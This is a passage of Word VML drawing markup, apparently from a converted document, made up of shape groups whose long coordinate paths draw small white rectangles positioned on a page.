2897,10004,2900,10004,2902,10004,2905,10004,2905,10004,2905,10004,2905,10004,2905,10004,2905,10004,2905,10004,2905,10004,2905,10004,2905,10004,2905,10004,2905,10004,2905,10004,2905,10004,2905,10004,2905,10004,2905,10005,2905,10005,2905,10005,2905,10005,2905,10005,2905,10005,2905,10005,2905,10006,2905,10006,2905,10006,2905,10006,2905,10007,2905,10007,2905,10007,2905,10008,2905,10008,2905,10009,2905,10009,2905,10009,2905,10010,2905,10011,2905,10011,2905,10012,2905,10012,2905,10013,2905,10014,2905,10014,2905,10015,2905,10016,2905,10017,2905,10018,2905,10019,2905,10020,2905,10021,2905,10022,2905,10023,2905,10024,2905,10025,2905,10027,2905,10028,2905,10029,2905,10031,2905,10032,2905,10034,2905,10035,2905,10037,2905,10038,2905,10040,2905,10042,2905,10044,2905,10046,2905,10048,2905,10050,2905,10052,2905,10054,2905,10056,2905,10058,2905,10061,2905,10063,2905,10065,2905,10068,2905,10070,2905,10073,2905,10076,2905,10079,2905,10082,2905,10084,2905,10088,2905,10091,2905,10094,2905,10097,2905,10100,2905,10104,2905,10107,2905,10111,2905,10114,2905,10118,2905,10122,2905,10126,2905,10130,2905,10134,2905,10138,2905,10142,2905,10147,2905,10151,2905,10155,2905,10160,2905,10165,2905,10169,2905,10174,2905,10179,2905,10184,2905,10190,2905,10195,2905,10200,2905,10206,2905,10211,2905,10217,2905,10222,2905,10228,2905,10234,2905,10240,2905,10247,2905,10253,2905,10259,2905,10259,2905,10259,2905,10259,2905,10259,2905,10259,2905,10259,2905,10259,2905,10259,2905,10259,2905,10259,2905,10259,2905,10259,2905,10259,2905,10259,2905,10259,2905,10259,2905,10259,2905,10259,2905,10259,2905,10259,2905,10259,2905,10259,2905,10259,2905,10259,2904,10259,2904,10259,2904,10259,2904,10259,2904,10259,2904,10259,2904,10259,2903,10259,2903,10259,2903,10259,2903,10259,2902,10259,2902,10259,2902,10259,2902,10259,2901,10259,2901,10259,2901,10259,2900,10259,2900,10259,2899,10259,2899,10259,2899,10259,2898,10259,2898,10259,2897,10259,2897,10259,2896,10259,2895,10259,2895,10259,2894,10259,2894,10259,2893,10259,2892,10259,2892,10259,2891,10259,2890,10259,2889,10259,2888,10259,2888,10259,2887,10259,2886,10259,2885,10259,2884,10259,2883,10259,2882,10259,2881,10259,2880,10259,2879,10259,2878,10259,2877,10259,2875,10259,2874,10259,2873,10259,2872,10259,2870,10259,2869,10259,2868,10259,2866,10259,2865,10259,2863,10259,2862,10259,2860,10259,2859,10259,2857,10259,2855,10259,2854,10259,2852,10259,2850,10259,2848,10259,2846,10259,2844,10259,2842,10259,2840,10259,2838,10259,2836,10259,2834,10259,2832,10259,2830,10259,2828,10259,2825,10259,2823,10259,2821,10259,2818,10259,2816,10259,2813,10259,2811,10259,2808,10259,2805,10259,2803,10259,2800,10259,2797,10259,2794,10259,2791,10259,2788,10259,2785,10259,2785,10259,2785,10259,2785,10259,2785,10259,2785,10259,2785,10259,2785,10259,2785,10259,2785,10259,2785,10259,2785,10259,2785,10259,2785,10259,2785,10259,2785,10259,2785,10259,2785,10259,2785,10258,2785,10258,2785,10258,2785,10258,2785,10258,2785,10258,2785,10257,2785,10257,2785,10257,2785,10257,2785,10256,2785,10256,2785,10255,2785,10255,2785,10255,2785,10254,2785,10254,2785,10253,2785,10253,2785,10252,2785,10251,2785,10251,2785,10250,2785,10249,2785,10249,2785,10248,2785,10247,2785,10246,2785,10245,2785,10244,2785,10243,2785,10242,2785,10241,2785,10240,2785,10239,2785,10238,2785,10237,2785,10235,2785,10234,2785,10233,2785,10231,2785,10230,2785,10228,2785,10226,2785,10225,2785,10223,2785,10221,2785,10219,2785,10218,2785,10216,2785,10214,2785,10212,2785,10209,2785,10207,2785,10205,2785,10203,2785,10200,2785,10198,2785,10195,2785,10193,2785,10190,2785,10187,2785,10185,2785,10182,2785,10179,2785,10176,2785,10173,2785,10169,2785,10166,2785,10163,2785,10159,2785,10156,2785,10152,2785,10149,2785,10145,2785,10141,2785,10137,2785,10133,2785,10129,2785,10125,2785,10121,2785,10117,2785,10112,2785,10108,2785,10103,2785,10099,2785,10094,2785,10089,2785,10084,2785,10079,2785,10074,2785,10068,2785,10063,2785,10058,2785,10052,2785,10046,2785,10041,2785,10035,2785,10029,2785,10023,2785,10017,2785,10010,2785,10004e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:114.500pt;margin-top:531.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2290,10630" coordsize="130,270">
        <v:shape style="position:absolute;left:2290;top:10630;width:130;height:270" coordorigin="2290,10630" coordsize="130,270" path="m2305,10649l2305,10649,2305,10649,2305,10649,2305,10649,2305,10649,2305,10649,2305,10649,2305,10649,2305,10649,2305,10649,2305,10649,2305,10649,2305,10649,2305,10649,2305,10649,2305,10649,2305,10649,2306,10649,2306,10649,2306,10649,2306,10649,2306,10649,2306,10649,2306,10649,2306,10649,2306,10649,2306,10649,2307,10649,2307,10649,2307,10649,2307,10649,2307,10649,2307,10649,2308,10649,2308,10649,2308,10649,2308,10649,2309,10649,2309,10649,2309,10649,2310,10649,2310,10649,2310,10649,2311,10649,2311,10649,2312,10649,2312,10649,2313,10649,2313,10649,2314,10649,2314,10649,2315,10649,2315,10649,2316,10649,2316,10649,2317,10649,2318,10649,2318,10649,2319,10649,2320,10649,2321,10649,2321,10649,2322,10649,2323,10649,2324,10649,2325,10649,2326,10649,2327,10649,2328,10649,2329,10649,2330,10649,2331,10649,2332,10649,2333,10649,2334,10649,2335,10649,2336,10649,2338,10649,2339,10649,2340,10649,2342,10649,2343,10649,2344,10649,2346,10649,2347,10649,2349,10649,2350,10649,2352,10649,2354,10649,2355,10649,2357,10649,2359,10649,2361,10649,2362,10649,2364,10649,2366,10649,2368,10649,2370,10649,2372,10649,2374,10649,2376,10649,2379,10649,2381,10649,2383,10649,2385,10649,2388,10649,2390,10649,2392,10649,2395,10649,2397,10649,2400,10649,2403,10649,2405,10649,2408,10649,2411,10649,2414,10649,2416,10649,2419,10649,2422,10649,2425,10649,2425,10649,2425,10649,2425,10649,2425,10649,2425,10649,2425,10649,2425,10649,2425,10649,2425,10649,2425,10649,2425,10650,2425,10650,2425,10650,2425,10650,2425,10650,2425,10650,2425,10650,2425,10650,2425,10650,2425,10650,2425,10651,2425,10651,2425,10651,2425,10651,2425,10651,2425,10652,2425,10652,2425,10652,2425,10653,2425,10653,2425,10653,2425,10654,2425,10654,2425,10655,2425,10655,2425,10656,2425,10656,2425,10657,2425,10658,2425,10658,2425,10659,2425,10660,2425,10661,2425,10661,2425,10662,2425,10663,2425,10664,2425,10665,2425,10666,2425,10667,2425,10668,2425,10669,2425,10671,2425,10672,2425,10673,2425,10675,2425,10676,2425,10677,2425,10679,2425,10680,2425,10682,2425,10684,2425,10685,2425,10687,2425,10689,2425,10691,2425,10693,2425,10695,2425,10697,2425,10699,2425,10701,2425,10704,2425,10706,2425,10708,2425,10711,2425,10713,2425,10716,2425,10718,2425,10721,2425,10724,2425,10727,2425,10730,2425,10733,2425,10736,2425,10739,2425,10742,2425,10746,2425,10749,2425,10753,2425,10756,2425,10760,2425,10763,2425,10767,2425,10771,2425,10775,2425,10779,2425,10783,2425,10788,2425,10792,2425,10796,2425,10801,2425,10805,2425,10810,2425,10815,2425,10820,2425,10825,2425,10830,2425,10835,2425,10840,2425,10845,2425,10851,2425,10856,2425,10862,2425,10868,2425,10874,2425,10880,2425,10886,2425,10892,2425,10898,2425,10904,2425,10904,2425,10904,2425,10904,2425,10904,2425,10904,2425,10904,2425,10904,2425,10904,2425,10904,2425,10904,2425,10904,2425,10904,2425,10904,2425,10904,2425,10904,2425,10904,2425,10904,2425,10904,2425,10904,2425,10904,2425,10904,2425,10904,2424,10904,2424,10904,2424,10904,2424,10904,2424,10904,2424,10904,2424,10904,2423,10904,2423,10904,2423,10904,2423,10904,2423,10904,2422,10904,2422,10904,2422,10904,2422,10904,2421,10904,2421,10904,2421,10904,2420,10904,2420,10904,2420,10904,2419,10904,2419,10904,2418,10904,2418,10904,2417,10904,2417,10904,2416,10904,2416,10904,2415,10904,2415,10904,2414,10904,2413,10904,2413,10904,2412,10904,2411,10904,2411,10904,2410,10904,2409,10904,2408,10904,2407,10904,2407,10904,2406,10904,2405,10904,2404,10904,2403,10904,2402,10904,2401,10904,2400,10904,2399,10904,2398,10904,2396,10904,2395,10904,2394,10904,2393,10904,2391,10904,2390,10904,2389,10904,2387,10904,2386,10904,2384,10904,2383,10904,2381,10904,2380,10904,2378,10904,2377,10904,2375,10904,2373,10904,2372,10904,2370,10904,2368,10904,2366,10904,2364,10904,2362,10904,2360,10904,2358,10904,2356,10904,2354,10904,2352,10904,2350,10904,2347,10904,2345,10904,2343,10904,2340,10904,2338,10904,2335,10904,2333,10904,2330,10904,2328,10904,2325,10904,2322,10904,2320,10904,2317,10904,2314,10904,2311,10904,2308,10904,2305,10904,2305,10904,2305,10904,2305,10904,2305,10904,2305,10904,2305,10904,2305,10904,2305,10904,2305,10904,2305,10904,2305,10904,2305,10904,2305,10904,2305,10904,2305,10904,2305,10904,2305,10904,2305,10904,2305,10904,2305,10903,2305,10903,2305,10903,2305,10903,2305,10903,2305,10902,2305,10902,2305,10902,2305,10902,2305,10901,2305,10901,2305,10900,2305,10900,2305,10900,2305,10899,2305,10899,2305,10898,2305,10897,2305,10897,2305,10896,2305,10896,2305,10895,2305,10894,2305,10893,2305,10892,2305,10892,2305,10891,2305,10890,2305,10889,2305,10888,2305,10887,2305,10886,2305,10884,2305,10883,2305,10882,2305,10881,2305,10879,2305,10878,2305,10876,2305,10875,2305,10873,2305,10872,2305,10870,2305,10868,2305,10867,2305,10865,2305,10863,2305,10861,2305,10859,2305,10857,2305,10855,2305,10853,2305,10850,2305,10848,2305,10846,2305,10843,2305,10841,2305,10838,2305,10835,2305,10833,2305,10830,2305,10827,2305,10824,2305,10821,2305,10818,2305,10815,2305,10812,2305,10808,2305,10805,2305,10801,2305,10798,2305,10794,2305,10790,2305,10787,2305,10783,2305,10779,2305,10775,2305,10771,2305,10766,2305,10762,2305,10758,2305,10753,2305,10749,2305,10744,2305,10739,2305,10734,2305,10729,2305,10724,2305,10719,2305,10714,2305,10708,2305,10703,2305,10697,2305,10692,2305,10686,2305,10680,2305,10674,2305,10668,2305,10662,2305,10656,2305,10649e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:138.500pt;margin-top:531.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2770,10630" coordsize="130,270">
        <v:shape style="position:absolute;left:2770;top:10630;width:130;height:270" coordorigin="2770,10630" coordsize="130,270" path="m2785,10649l2785,10649,2785,10649,2785,10649,2785,10649,2785,10649,2785,10649,2785,10649,2785,10649,2785,10649,2785,10649,2785,10649,2785,10649,2786,10649,2786,10649,2786,10649,2786,10649,2786,10649,2786,10649,2786,10649,2786,10649,2786,10649,2786,10649,2786,10649,2786,10649,2786,10649,2787,10649,2787,10649,2787,10649,2787,10649,2787,10649,2787,10649,2788,10649,2788,10649,2788,10649,2788,10649,2788,10649,2789,10649,2789,10649,2789,10649,2790,10649,2790,10649,2790,10649,2791,10649,2791,10649,2791,10649,2792,10649,2792,10649,2793,10649,2793,10649,2794,10649,2794,10649,2795,10649,2795,10649,2796,10649,2797,10649,2797,10649,2798,10649,2799,10649,2799,10649,2800,10649,2801,10649,2802,10649,2802,10649,2803,10649,2804,10649,2805,10649,2806,10649,2807,10649,2808,10649,2809,10649,2810,10649,2811,10649,2812,10649,2813,10649,2814,10649,2815,10649,2817,10649,2818,10649,2819,10649,2821,10649,2822,10649,2823,10649,2825,10649,2826,10649,2828,10649,2829,10649,2831,10649,2832,10649,2834,10649,2836,10649,2837,10649,2839,10649,2841,10649,2843,10649,2845,10649,2846,10649,2848,10649,2850,10649,2852,10649,2855,10649,2857,10649,2859,10649,2861,10649,2863,10649,2866,10649,2868,10649,2870,10649,2873,10649,2875,10649,2878,10649,2880,10649,2883,10649,2885,10649,2888,10649,2891,10649,2894,10649,2897,10649,2900,10649,2902,10649,2905,10649,2905,10649,2905,10649,2905,10649,2905,10649,2905,10649,2905,10649,2905,10649,2905,10649,2905,10649,2905,10649,2905,10650,2905,10650,2905,10650,2905,10650,2905,10650,2905,10650,2905,10650,2905,10650,2905,10650,2905,10650,2905,10651,2905,10651,2905,10651,2905,10651,2905,10651,2905,10652,2905,10652,2905,10652,2905,10653,2905,10653,2905,10653,2905,10654,2905,10654,2905,10655,2905,10655,2905,10656,2905,10656,2905,10657,2905,10658,2905,10658,2905,10659,2905,10660,2905,10661,2905,10661,2905,10662,2905,10663,2905,10664,2905,10665,2905,10666,2905,10667,2905,10668,2905,10669,2905,10671,2905,10672,2905,10673,2905,10675,2905,10676,2905,10677,2905,10679,2905,10680,2905,10682,2905,10684,2905,10685,2905,10687,2905,10689,2905,10691,2905,10693,2905,10695,2905,10697,2905,10699,2905,10701,2905,10704,2905,10706,2905,10708,2905,10711,2905,10713,2905,10716,2905,10718,2905,10721,2905,10724,2905,10727,2905,10730,2905,10733,2905,10736,2905,10739,2905,10742,2905,10746,2905,10749,2905,10753,2905,10756,2905,10760,2905,10763,2905,10767,2905,10771,2905,10775,2905,10779,2905,10783,2905,10788,2905,10792,2905,10796,2905,10801,2905,10805,2905,10810,2905,10815,2905,10820,2905,10825,2905,10830,2905,10835,2905,10840,2905,10845,2905,10851,2905,10856,2905,10862,2905,10868,2905,10874,2905,10880,2905,10886,2905,10892,2905,10898,2905,10904,2905,10904,2905,10904,2905,10904,2905,10904,2905,10904,2905,10904,2905,10904,2905,10904,2905,10904,2905,10904,2905,10904,2905,10904,2905,10904,2905,10904,2905,10904,2905,10904,2905,10904,2905,10904,2905,10904,2905,10904,2905,10904,2905,10904,2905,10904,2905,10904,2904,10904,2904,10904,2904,10904,2904,10904,2904,10904,2904,10904,2904,10904,2903,10904,2903,10904,2903,10904,2903,10904,2902,10904,2902,10904,2902,10904,2902,10904,2901,10904,2901,10904,2901,10904,2900,10904,2900,10904,2899,10904,2899,10904,2899,10904,2898,10904,2898,10904,2897,10904,2897,10904,2896,10904,2895,10904,2895,10904,2894,10904,2894,10904,2893,10904,2892,10904,2892,10904,2891,10904,2890,10904,2889,10904,2888,10904,2888,10904,2887,10904,2886,10904,2885,10904,2884,10904,2883,10904,2882,10904,2881,10904,2880,10904,2879,10904,2878,10904,2877,10904,2875,10904,2874,10904,2873,10904,2872,10904,2870,10904,2869,10904,2868,10904,2866,10904,2865,10904,2863,10904,2862,10904,2860,10904,2859,10904,2857,10904,2855,10904,2854,10904,2852,10904,2850,10904,2848,10904,2846,10904,2844,10904,2842,10904,2840,10904,2838,10904,2836,10904,2834,10904,2832,10904,2830,10904,2828,10904,2825,10904,2823,10904,2821,10904,2818,10904,2816,10904,2813,10904,2811,10904,2808,10904,2805,10904,2803,10904,2800,10904,2797,10904,2794,10904,2791,10904,2788,10904,2785,10904,2785,10904,2785,10904,2785,10904,2785,10904,2785,10904,2785,10904,2785,10904,2785,10904,2785,10904,2785,10904,2785,10904,2785,10904,2785,10904,2785,10904,2785,10904,2785,10904,2785,10904,2785,10904,2785,10904,2785,10903,2785,10903,2785,10903,2785,10903,2785,10903,2785,10902,2785,10902,2785,10902,2785,10902,2785,10901,2785,10901,2785,10900,2785,10900,2785,10900,2785,10899,2785,10899,2785,10898,2785,10897,2785,10897,2785,10896,2785,10896,2785,10895,2785,10894,2785,10893,2785,10892,2785,10892,2785,10891,2785,10890,2785,10889,2785,10888,2785,10887,2785,10886,2785,10884,2785,10883,2785,10882,2785,10881,2785,10879,2785,10878,2785,10876,2785,10875,2785,10873,2785,10872,2785,10870,2785,10868,2785,10867,2785,10865,2785,10863,2785,10861,2785,10859,2785,10857,2785,10855,2785,10853,2785,10850,2785,10848,2785,10846,2785,10843,2785,10841,2785,10838,2785,10835,2785,10833,2785,10830,2785,10827,2785,10824,2785,10821,2785,10818,2785,10815,2785,10812,2785,10808,2785,10805,2785,10801,2785,10798,2785,10794,2785,10790,2785,10787,2785,10783,2785,10779,2785,10775,2785,10771,2785,10766,2785,10762,2785,10758,2785,10753,2785,10749,2785,10744,2785,10739,2785,10734,2785,10729,2785,10724,2785,10719,2785,10714,2785,10708,2785,10703,2785,10697,2785,10692,2785,10686,2785,10680,2785,10674,2785,10668,2785,10662,2785,10656,2785,10649e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:114.500pt;margin-top:563.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2290,11270" coordsize="130,250">
        <v:shape style="position:absolute;left:2290;top:11270;width:130;height:250" coordorigin="2290,11270" coordsize="130,250" path="m2305,11280l2305,11280,2305,11280,2305,11280,2305,11280,2305,11280,2305,11280,2305,11280,2305,11280,2305,11280,2305,11280,2305,11280,2305,11280,2305,11280,2305,11280,2305,11280,2305,11280,2305,11280,2306,11280,2306,11280,2306,11280,2306,11280,2306,11280,2306,11280,2306,11280,2306,11280,2306,11280,2306,11280,2307,11280,2307,11280,2307,11280,2307,11280,2307,11280,2307,11280,2308,11280,2308,11280,2308,11280,2308,11280,2309,11280,2309,11280,2309,11280,2310,11280,2310,11280,2310,11280,2311,11280,2311,11280,2312,11280,2312,11280,2313,11280,2313,11280,2314,11280,2314,11280,2315,11280,2315,11280,2316,11280,2316,11280,2317,11280,2318,11280,2318,11280,2319,11280,2320,11280,2321,11280,2321,11280,2322,11280,2323,11280,2324,11280,2325,11280,2326,11280,2327,11280,2328,11280,2329,11280,2330,11280,2331,11280,2332,11280,2333,11280,2334,11280,2335,11280,2336,11280,2338,11280,2339,11280,2340,11280,2342,11280,2343,11280,2344,11280,2346,11280,2347,11280,2349,11280,2350,11280,2352,11280,2354,11280,2355,11280,2357,11280,2359,11280,2361,11280,2362,11280,2364,11280,2366,11280,2368,11280,2370,11280,2372,11280,2374,11280,2376,11280,2379,11280,2381,11280,2383,11280,2385,11280,2388,11280,2390,11280,2392,11280,2395,11280,2397,11280,2400,11280,2403,11280,2405,11280,2408,11280,2411,11280,2414,11280,2416,11280,2419,11280,2422,11280,2425,11280,2425,11280,2425,11280,2425,11280,2425,11280,2425,11280,2425,11280,2425,11280,2425,11280,2425,11280,2425,11280,2425,11280,2425,11280,2425,11280,2425,11280,2425,11280,2425,11280,2425,11280,2425,11280,2425,11281,2425,11281,2425,11281,2425,11281,2425,11281,2425,11282,2425,11282,2425,11282,2425,11282,2425,11283,2425,11283,2425,11283,2425,11284,2425,11284,2425,11285,2425,11285,2425,11286,2425,11286,2425,11287,2425,11287,2425,11288,2425,11289,2425,11289,2425,11290,2425,11291,2425,11292,2425,11293,2425,11293,2425,11294,2425,11295,2425,11296,2425,11297,2425,11299,2425,11300,2425,11301,2425,11302,2425,11304,2425,11305,2425,11306,2425,11308,2425,11309,2425,11311,2425,11312,2425,11314,2425,11316,2425,11318,2425,11319,2425,11321,2425,11323,2425,11325,2425,11327,2425,11329,2425,11332,2425,11334,2425,11336,2425,11339,2425,11341,2425,11344,2425,11346,2425,11349,2425,11352,2425,11354,2425,11357,2425,11360,2425,11363,2425,11366,2425,11369,2425,11373,2425,11376,2425,11379,2425,11383,2425,11386,2425,11390,2425,11394,2425,11398,2425,11401,2425,11405,2425,11409,2425,11414,2425,11418,2425,11422,2425,11427,2425,11431,2425,11436,2425,11440,2425,11445,2425,11450,2425,11455,2425,11460,2425,11465,2425,11470,2425,11476,2425,11481,2425,11487,2425,11492,2425,11498,2425,11504,2425,11510,2425,11516,2425,11522,2425,11528,2425,11535,2425,11535,2425,11535,2425,11535,2425,11535,2425,11535,2425,11535,2425,11535,2425,11535,2425,11535,2425,11535,2425,11535,2425,11535,2425,11535,2425,11535,2425,11535,2425,11535,2425,11535,2425,11535,2425,11535,2425,11535,2425,11535,2425,11535,2424,11535,2424,11535,2424,11535,2424,11535,2424,11535,2424,11535,2424,11535,2423,11535,2423,11535,2423,11535,2423,11535,2423,11535,2422,11535,2422,11535,2422,11535,2422,11535,2421,11535,2421,11535,2421,11535,2420,11535,2420,11535,2420,11535,2419,11535,2419,11535,2418,11535,2418,11535,2417,11535,2417,11535,2416,11535,2416,11535,2415,11535,2415,11535,2414,11535,2413,11535,2413,11535,2412,11535,2411,11535,2411,11535,2410,11535,2409,11535,2408,11535,2407,11535,2407,11535,2406,11535,2405,11535,2404,11535,2403,11535,2402,11535,2401,11535,2400,11535,2399,11535,2398,11535,2396,11535,2395,11535,2394,11535,2393,11535,2391,11535,2390,11535,2389,11535,2387,11535,2386,11535,2384,11535,2383,11535,2381,11535,2380,11535,2378,11535,2377,11535,2375,11535,2373,11535,2372,11535,2370,11535,2368,11535,2366,11535,2364,11535,2362,11535,2360,11535,2358,11535,2356,11535,2354,11535,2352,11535,2350,11535,2347,11535,2345,11535,2343,11535,2340,11535,2338,11535,2335,11535,2333,11535,2330,11535,2328,11535,2325,11535,2322,11535,2320,11535,2317,11535,2314,11535,2311,11535,2308,11535,2305,11535,2305,11535,2305,11535,2305,11535,2305,11535,2305,11535,2305,11535,2305,11535,2305,11535,2305,11535,2305,11535,2305,11535,2305,11535,2305,11535,2305,11534,2305,11534,2305,11534,2305,11534,2305,11534,2305,11534,2305,11534,2305,11534,2305,11533,2305,11533,2305,11533,2305,11533,2305,11532,2305,11532,2305,11532,2305,11531,2305,11531,2305,11531,2305,11530,2305,11530,2305,11529,2305,11529,2305,11528,2305,11528,2305,11527,2305,11527,2305,11526,2305,11525,2305,11524,2305,11524,2305,11523,2305,11522,2305,11521,2305,11520,2305,11519,2305,11518,2305,11517,2305,11516,2305,11515,2305,11514,2305,11512,2305,11511,2305,11510,2305,11508,2305,11507,2305,11505,2305,11504,2305,11502,2305,11500,2305,11499,2305,11497,2305,11495,2305,11493,2305,11491,2305,11489,2305,11487,2305,11485,2305,11483,2305,11481,2305,11478,2305,11476,2305,11473,2305,11471,2305,11468,2305,11466,2305,11463,2305,11460,2305,11457,2305,11454,2305,11451,2305,11448,2305,11445,2305,11442,2305,11439,2305,11435,2305,11432,2305,11428,2305,11424,2305,11421,2305,11417,2305,11413,2305,11409,2305,11405,2305,11401,2305,11397,2305,11392,2305,11388,2305,11383,2305,11379,2305,11374,2305,11369,2305,11365,2305,11360,2305,11354,2305,11349,2305,11344,2305,11339,2305,11333,2305,11328,2305,11322,2305,11316,2305,11311,2305,11305,2305,11298,2305,11292,2305,11286,2305,11280e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:138.500pt;margin-top:563.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2770,11270" coordsize="130,250">
        <v:shape style="position:absolute;left:2770;top:11270;width:130;height:250" coordorigin="2770,11270" coordsize="130,250" path="m2785,11280l2785,11280,2785,11280,2785,11280,2785,11280,2785,11280,2785,11280,2785,11280,2785,11280,2785,11280,2785,11280,2785,11280,2785,11280,2786,11280,2786,11280,2786,11280,2786,11280,2786,11280,2786,11280,2786,11280,2786,11280,2786,11280,2786,11280,2786,11280,2786,11280,2786,11280,2787,11280,2787,11280,2787,11280,2787,11280,2787,11280,2787,11280,2788,11280,2788,11280,2788,11280,2788,11280,2788,11280,2789,11280,2789,11280,2789,11280,2790,11280,2790,11280,2790,11280,2791,11280,2791,11280,2791,11280,2792,11280,2792,11280,2793,11280,2793,11280,2794,11280,2794,11280,2795,11280,2795,11280,2796,11280,2797,11280,2797,11280,2798,11280,2799,11280,2799,11280,2800,11280,2801,11280,2802,11280,2802,11280,2803,11280,2804,11280,2805,11280,2806,11280,2807,11280,2808,11280,2809,11280,2810,11280,2811,11280,2812,11280,2813,11280,2814,11280,2815,11280,2817,11280,2818,11280,2819,11280,2821,11280,2822,11280,2823,11280,2825,11280,2826,11280,2828,11280,2829,11280,2831,11280,2832,11280,2834,11280,2836,11280,2837,11280,2839,11280,2841,11280,2843,11280,2845,11280,2846,11280,2848,11280,2850,11280,2852,11280,2855,11280,2857,11280,2859,11280,2861,11280,2863,11280,2866,11280,2868,11280,2870,11280,2873,11280,2875,11280,2878,11280,2880,11280,2883,11280,2885,11280,2888,11280,2891,11280,2894,11280,2897,11280,2900,11280,2902,11280,2905,11280,2905,11280,2905,11280,2905,11280,2905,11280,2905,11280,2905,11280,2905,11280,2905,11280,2905,11280,2905,11280,2905,11280,2905,11280,2905,11280,2905,11280,2905,11280,2905,11280,2905,11280,2905,11280,2905,11281,2905,11281,2905,11281,2905,11281,2905,11281,2905,11282,2905,11282,2905,11282,2905,11282,2905,11283,2905,11283,2905,11283,2905,11284,2905,11284,2905,11285,2905,11285,2905,11286,2905,11286,2905,11287,2905,11287,2905,11288,2905,11289,2905,11289,2905,11290,2905,11291,2905,11292,2905,11293,2905,11293,2905,11294,2905,11295,2905,11296,2905,11297,2905,11299,2905,11300,2905,11301,2905,11302,2905,11304,2905,11305,2905,11306,2905,11308,2905,11309,2905,11311,2905,11312,2905,11314,2905,11316,2905,11318,2905,11319,2905,11321,2905,11323,2905,11325,2905,11327,2905,11329,2905,11332,2905,11334,2905,11336,2905,11339,2905,11341,2905,11344,2905,11346,2905,11349,2905,11352,2905,11354,2905,11357,2905,11360,2905,11363,2905,11366,2905,11369,2905,11373,2905,11376,2905,11379,2905,11383,2905,11386,2905,11390,2905,11394,2905,11398,2905,11401,2905,11405,2905,11409,2905,11414,2905,11418,2905,11422,2905,11427,2905,11431,2905,11436,2905,11440,2905,11445,2905,11450,2905,11455,2905,11460,2905,11465,2905,11470,2905,11476,2905,11481,2905,11487,2905,11492,2905,11498,2905,11504,2905,11510,2905,11516,2905,11522,2905,11528,2905,11535,2905,11535,2905,11535,2905,11535,2905,11535,2905,11535,2905,11535,2905,11535,2905,11535,2905,11535,2905,11535,2905,11535,2905,11535,2905,11535,2905,11535,2905,11535,2905,11535,2905,11535,2905,11535,2905,11535,2905,11535,2905,11535,2905,11535,2905,11535,2905,11535,2904,11535,2904,11535,2904,11535,2904,11535,2904,11535,2904,11535,2904,11535,2903,11535,2903,11535,2903,11535,2903,11535,2902,11535,2902,11535,2902,11535,2902,11535,2901,11535,2901,11535,2901,11535,2900,11535,2900,11535,2899,11535,2899,11535,2899,11535,2898,11535,2898,11535,2897,11535,2897,11535,2896,11535,2895,11535,2895,11535,2894,11535,2894,11535,2893,11535,2892,11535,2892,11535,2891,11535,2890,11535,2889,11535,2888,11535,2888,11535,2887,11535,2886,11535,2885,11535,2884,11535,2883,11535,2882,11535,2881,11535,2880,11535,2879,11535,2878,11535,2877,11535,2875,11535,2874,11535,2873,11535,2872,11535,2870,11535,2869,11535,2868,11535,2866,11535,2865,11535,2863,11535,2862,11535,2860,11535,2859,11535,2857,11535,2855,11535,2854,11535,2852,11535,2850,11535,2848,11535,2846,11535,2844,11535,2842,11535,2840,11535,2838,11535,2836,11535,2834,11535,2832,11535,2830,11535,2828,11535,2825,11535,2823,11535,2821,11535,2818,11535,2816,11535,2813,11535,2811,11535,2808,11535,2805,11535,2803,11535,2800,11535,2797,11535,2794,11535,2791,11535,2788,11535,2785,11535,2785,11535,2785,11535,2785,11535,2785,11535,2785,11535,2785,11535,2785,11535,2785,11535,2785,11535,2785,11535,2785,11535,2785,11535,2785,11535,2785,11534,2785,11534,2785,11534,2785,11534,2785,11534,2785,11534,2785,11534,2785,11534,2785,11533,2785,11533,2785,11533,2785,11533,2785,11532,2785,11532,2785,11532,2785,11531,2785,11531,2785,11531,2785,11530,2785,11530,2785,11529,2785,11529,2785,11528,2785,11528,2785,11527,2785,11527,2785,11526,2785,11525,2785,11524,2785,11524,2785,11523,2785,11522,2785,11521,2785,11520,2785,11519,2785,11518,2785,11517,2785,11516,2785,11515,2785,11514,2785,11512,2785,11511,2785,11510,2785,11508,2785,11507,2785,11505,2785,11504,2785,11502,2785,11500,2785,11499,2785,11497,2785,11495,2785,11493,2785,11491,2785,11489,2785,11487,2785,11485,2785,11483,2785,11481,2785,11478,2785,11476,2785,11473,2785,11471,2785,11468,2785,11466,2785,11463,2785,11460,2785,11457,2785,11454,2785,11451,2785,11448,2785,11445,2785,11442,2785,11439,2785,11435,2785,11432,2785,11428,2785,11424,2785,11421,2785,11417,2785,11413,2785,11409,2785,11405,2785,11401,2785,11397,2785,11392,2785,11388,2785,11383,2785,11379,2785,11374,2785,11369,2785,11365,2785,11360,2785,11354,2785,11349,2785,11344,2785,11339,2785,11333,2785,11328,2785,11322,2785,11316,2785,11311,2785,11305,2785,11298,2785,11292,2785,11286,2785,11280e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:114.500pt;margin-top:595.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2290,11910" coordsize="130,270">
